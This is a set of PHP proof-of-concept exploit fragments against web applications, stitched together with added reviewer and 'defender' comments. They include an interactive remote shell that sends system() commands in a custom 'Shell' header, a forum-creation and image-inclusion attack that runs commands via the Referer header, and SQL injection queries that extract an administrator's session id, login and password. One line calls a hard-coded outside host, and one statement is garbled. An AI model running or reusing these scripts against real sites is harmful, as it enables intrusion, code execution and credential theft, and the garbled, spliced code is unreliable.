// Fragment of a proof-of-concept script; its beginning is outside this excerpt.
// $xpl appears to be an HTTP client object, and $url, $postdata, $mode and
// $all are set earlier -- none of them is defined in the visible code.
//
// Visible flow:
//   1. POST $postdata to the application's `?page=configuration&op=modify` page.
//   2. $mode == 0: add an `upload: 1` request header and look for the marker
//      "upfiledone" in the response. Otherwise: run an interactive loop that
//      sends each typed line inside a `Shell` request header.
//   3. Put the site configuration back and delete an avatar.
//
// Defender notes (all taken from the lines below):
//   - The command travels in a custom request header, not in the URL or the
//     body, so logs that record only the request line will not show it.
//     Logging or filtering unexpected `Shell` / `upload` request headers is
//     the relevant control.
//   - The script restores the configuration afterwards, so settings that look
//     normal do not rule out that this ran.
//   - `w00t.php` directly under the site URL is the file name the script
//     reports for the uploader; its presence on disk is worth checking.
$xpl->post($url . '?page=configuration&op=modify', $postdata);
print "done\n";
$success = true;
if ($mode == 0) {
    print " * loading uploader\t";
    // Marks the request with an `upload` header before fetching the front page.
    $xpl->addheader("upload", "1");
    // Success is judged only by the case-insensitive marker "upfiledone"
    // appearing in the response.
    if (preg_match("#upfiledone#i", $xpl->get($url))) {
        print "done\n";
    } else {
        $success = false;
        print "error\n";
    }
} else {
    print "\n\$shell> ";
    // Reads lines from STDIN until the operator types "quit" or "exit".
    while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) {
        // presumably clears the headers added in the previous iteration -- confirm
        // against the client class, which is not part of this excerpt
        $xpl->reset('header');
        // The typed line is embedded, unescaped, in a PHP system() call that is
        // sent as the value of a `Shell` request header.
        $xpl->addheader('Shell', "system('{$cmd}');");
        $xpl->get($url);
        // The response body is split on the literal marker '123456789' and the
        // piece after the first marker is printed.
        $data = explode('123456789', $xpl->getcontent());
        print $data[1] . "\n\$shell> ";
    }
}
/* Reinitialize website name and homepage and erase user avatar */
print " * repairing homepage\t";
// This request goes to a hard-coded host; it is not built from $url.
$xpl->get('http://myannu.fr/?page=avatars&op=delete&id=1&mode=J');
// NOTE(review): the statement below is garbled in this copy. The string stops
// at "smtppassword=" and is followed by "******" and a stray "done\n", so the
// call that submits $postdata is not visible and the line is not valid PHP as
// shown.
$postdata = "nomsite={$all['1']}&urlsite={$url}&logo=logo.gif&pagestart=accueil&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=®lement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&ircserver=euroserv.fr.quakenet.org&ircport=6667&ircpassword=&ircchannels=%23phptournois+%23lan+%23lan.cs+%23lan.q3&mail=N&smtpserver=&smtpuser=&smtppassword="******"done\n";
// The uploader location is printed only when the earlier marker check passed
// ($success is left true in the interactive branch as well).
if ($success) {
    print "\n * uploader: " . $url . "w00t.php\n";
}
// Fragment of a second proof-of-concept script; its beginning is outside this
// excerpt. $xpl appears to be an HTTP client object, and $url, $name and
// $avatarur are set earlier -- none of them is defined in the visible code.
//
// Visible flow, all against the application's `myadmin.php`:
//   1. `action=create`     -- create a forum whose title and filename are $name.
//   2. `choix=1`           -- list forums and take the last `hide_forum` id.
//   3. `action=hide_forum` -- hide that forum.
//   4. `action=rec_perso`  -- set PARAM[top_url] to an avatar image path.
//   5. Interactive loop: each typed line is sent as the `Referer` header of a
//      request to `{$url}{$name}.php`.
//
// Defender notes (all taken from the lines below):
//   - The request sequence create -> hide_forum -> rec_perso on `myadmin.php`
//     within one session is the visible footprint in the access log.
//   - The forum is hidden right after creation, so reviewing only the forums
//     that are listed publicly would miss it.
//   - Commands are carried in the `Referer` header; Referer values that are
//     not URLs are the thing to alert on, and they appear only in logs that
//     record that header.
//   - `top_url` is pointed at a file under `./avatar/`; the status message
//     printed below says the intent is to have that picture included.
// Pick a style name from the first <option value='...'> in the last response;
// fall back to "xml_BlueLight" when none is found.
if (!preg_match("#<option value='(\\S+)'#", $xpl->getcontent(), $styles)) {
    $styles[1] = "xml_BlueLight";
}
$xpl->post($url . 'myadmin.php?action=create', "title={$name}&filename={$name}&passwd=&style=" . $styles[1] . "&structure=1&subject=");
$xpl->get($url . 'myadmin.php?choix=1');
// Collect every forum id that appears in a hide_forum link; stop if there is none.
if (!preg_match_all("#action=hide_forum&id=([0-9]+)#", $xpl->getcontent(), $fid)) {
    die("\nsploit> Can't retrieve the forum id");
}
// The last id on the page is used -- presumably the forum created just above,
// which holds only if the page lists forums in creation order (confirm).
$forumid = $fid[1][count($fid[1]) - 1];
$xpl->get($url . "myadmin.php?choix=1&action=hide_forum&id={$forumid}");
print "\nsploit> Done\nstatus> Trying to include the picture\n\$shell> ";
// Default image path when the caller supplied none.
if (empty($avatarur)) {
    $avatarur = "./avatar/{$name}.jpg";
}
// "PARAM%5Btop_url%5D" is the URL-encoded form of PARAM[top_url].
$xpl->post($url . "myadmin.php?action=rec_perso&id={$forumid}&choix=3", "PARAM%5Btop_url%5D={$avatarur}");
// presumably clears client state before the interactive loop -- confirm
// against the client class, which is not part of this excerpt
$xpl->reset();
// Reads lines from STDIN until the operator types "quit" or "exit".
while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) {
    // The typed line is sent verbatim as the Referer header.
    $xpl->addheader("Referer", $cmd);
    $xpl->get($url . $name . '.php');
    // The response body is split on the literal marker "337666733" and the
    // piece after the first marker is printed.
    $data = explode("337666733", $xpl->getcontent());
    print $data[1] . "\n\$shell> ";
}
// NOTE(review): the license header below is cut off in this excerpt; its
// closing marker is not visible.
/* * * Copyright (C) darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. *
} $queries = array(); $queries[] = array(" SID", "SELECT id FROM nuked_sessions WHERE user_id=(SELECT id FROM {$prefix}users WHERE niveau>=9 ORDER BY date LIMIT 0,1) LIMIT 0,1"); $queries[] = array(" UID", "SELECT id FROM nuked_users WHERE niveau>=9 LIMIT 0,1"); $queries[] = array(" Login", "SELECT pseudo FROM nuked_users WHERE niveau>=9 LIMIT 0,1"); $queries[] = array("Password", "SELECT pass FROM nuked_users WHERE niveau>=9 LIMIT 0,1"); $xpl->agent("Mozilla Firefox"); $xpl->addheader("X-Forwarded-For", "127.0.0.1"); $ctmp = $xpl->get($url . "index.php?file=Stats&page=visits"); if (preg_match('#<a href="javascript:history.back\\(\\)"><b>[^<]+</b>#i', $ctmp)) { exit("[*] You don't have rights to access Stats page.\n"); } if (preg_match('#<a href="index.php\\?file=User&op=login_screen">[^<]+</a> | <a href="index.php\\?file=User&op=reg_screen">[^<]+</a>#i', $ctmp)) { exit("[*] You must be registered, use -user param.\n"); } $xpl->reset("header"); $xpl->agent("Mozilla Firefox"); attack1(); attack2(); } function getparam($param, $opt = '') { global $argv; foreach ($argv as $value => $key) { if ($key == '-' . $param) { return $argv[$value + 1]; } } if ($opt) { exit("\n-{$param} parameter required"); } else {